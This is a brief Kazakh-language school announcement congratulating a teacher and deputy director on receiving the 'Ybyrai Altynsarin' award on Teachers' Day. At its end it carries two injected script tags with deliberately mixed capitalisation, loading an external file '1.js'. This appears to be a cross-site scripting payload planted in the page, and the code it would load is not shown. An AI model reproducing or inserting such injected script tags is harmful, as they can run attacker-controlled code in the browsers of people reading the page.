Мектебімізде СҮЙІНШІ жаңалық!!! Қазақ тілі мен әдебиеті мұғалімі, директордың оқу ісі орынбасары Дюсембаева Махаббат Манатовна 5 қазан- Мұғалімдер күніне арналған салтанатты іс шарада Ақмола облысы әкімі Марат Ахметжанов мырзаның қолынан білім беру саласындағы адал еңбегі үшін «ЫБЫРАЙ АЛТЫНСАРИН» төсбелгісін тақты. Өскелең ұрпаққа сапалы білім, саналы тәрбие берудегі көпжылғы еңбегі ескеріліп төсбелгіге ие болғаны үшін құттықтаймыз! Махаббат Манатовнаның сара жолы, шебер тәжірибесі еңбек жолын бастап келе жатқан жас мамандарға зор үлгі болатынына сенімдіміз! Мұғалімге деніне саулық, жанына шуақ, бойына қуат, отбасына бақ-береке тілейміз!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>